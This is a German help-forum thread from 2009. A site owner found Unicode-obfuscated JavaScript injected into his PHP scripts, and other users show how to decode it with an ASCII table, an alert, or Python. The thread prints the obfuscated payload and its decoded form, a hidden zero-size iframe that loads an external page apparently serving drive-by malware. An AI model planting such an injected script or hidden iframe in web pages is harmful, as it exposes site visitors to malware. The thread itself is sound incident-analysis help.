gelöst Was bedeutet das bzw. was kann ich bei sowas lesbar machen
Ich habe ein einer meiner PHP Scripte folgendes gefunden...
Scheinbar eine hinterlassenschaft eines netten Menschen, der sich illegal zu meinem Webspace Zugang verschafft hat... Wie kann ich sowas wieder leesbar machen bzw. herausfinden was das eigentlich tut?
01.
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>9 Antworten
- LÖSUNG Woolfsmann schreibt am 08.04.2009 um 14:08:26 Uhr
- LÖSUNG 35801 schreibt am 08.04.2009 um 14:15:52 Uhr
- LÖSUNG SlainteMhath schreibt am 08.04.2009 um 14:41:17 Uhr
- LÖSUNG 35801 schreibt am 08.04.2009 um 15:54:33 Uhr
- LÖSUNG miniversum schreibt am 08.04.2009 um 16:09:52 Uhr
- LÖSUNG SlainteMhath schreibt am 08.04.2009 um 16:11:02 Uhr
- LÖSUNG 35801 schreibt am 08.04.2009 um 16:18:50 Uhr
- LÖSUNG SlainteMhath schreibt am 08.04.2009 um 16:11:02 Uhr
- LÖSUNG Biber schreibt am 08.04.2009 um 16:17:57 Uhr
- LÖSUNG 35801 schreibt am 08.04.2009 um 16:21:05 Uhr
- LÖSUNG miniversum schreibt am 08.04.2009 um 16:09:52 Uhr
- LÖSUNG 35801 schreibt am 08.04.2009 um 15:54:33 Uhr
- LÖSUNG SlainteMhath schreibt am 08.04.2009 um 14:41:17 Uhr
- LÖSUNG 35801 schreibt am 08.04.2009 um 14:15:52 Uhr
LÖSUNG 08.04.2009 um 14:08 Uhr
Hi,
nach einer kurzen google suche komm denke ich das hier hilft dir.
http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687
gruß
Woolfsmann
nach einer kurzen google suche komm denke ich das hier hilft dir.
http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687
gruß
Woolfsmann
LÖSUNG 08.04.2009 um 14:15 Uhr
Danke... Hab mal in den Artikel reingesehen... aber wie und womit DECODIERT man das ??
Ich müsste wissen was das macht.
Ich müsste wissen was das macht.
LÖSUNG 08.04.2009 um 14:41 Uhr
Hi,
Und der versucht dann sicher einen trojaner per drive-by download auszuliefern.
lg,
Slainte
Ich müsste wissen was das macht.
das script fuegt einen unsichtbaren iframe auf Deiner Seite ein:01.
<iframe src="http://.../in.php" width=0 height=0 style='display:none'></iframe>lg,
Slainte
LÖSUNG 08.04.2009 um 15:54 Uhr
OK Danke!
Aber wie hast du das decodiert?
Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
Aber wie hast du das decodiert?
Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
LÖSUNG 08.04.2009 um 16:09 Uhr
Das ist leicht zu "decodieren". Du schnapst dir eine ASCII-Tabelle und los gehts.
So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
miniversum
\u003c
bedeutet z.B. für den Hexwert 0x3C. Schaust du den in einer ASCII Tabelle nach erhällst du dafür das Zeichen "<".So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063
ergeben somit<iframe src=
miniversum
LÖSUNG 08.04.2009 um 16:11 Uhr
oder Du ersetzt das "document.write" einfach durch ein "alert"
LÖSUNG 08.04.2009 um 16:17 Uhr
Moin diaz1983,
diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.
Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:
\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
.... wie SlainteMhath schon vorgeturnt hat.
Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.
Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:
\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
.... wie SlainteMhath schon vorgeturnt hat.
Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
LÖSUNG 08.04.2009 um 16:18 Uhr
Hab noch ne nette Methode gefunden...
Zumindest mit Python ging das ganz einfach auf meinem Fedora-System
Zumindest mit Python ging das ganz einfach auf meinem Fedora-System
01.
[peter@fedoraPC ~]# python 02.
Python 2.5.2 (r252:60911, Sep 30 2008, 15:41:38) 03.
[GCC 4.3.2 20080917 (Red Hat 4.3.2-4)] on linux2 04.
Type "help", "copyright", "credits" or "license" for more information. 05.
06.
>>> print u"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e" 07.
<iframe src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>LÖSUNG 08.04.2009 um 16:21 Uhr
OK Danke...
Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...
Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...
Ähnliche Inhalte
Neue Wissensbeiträge
Heiß diskutierte Inhalte
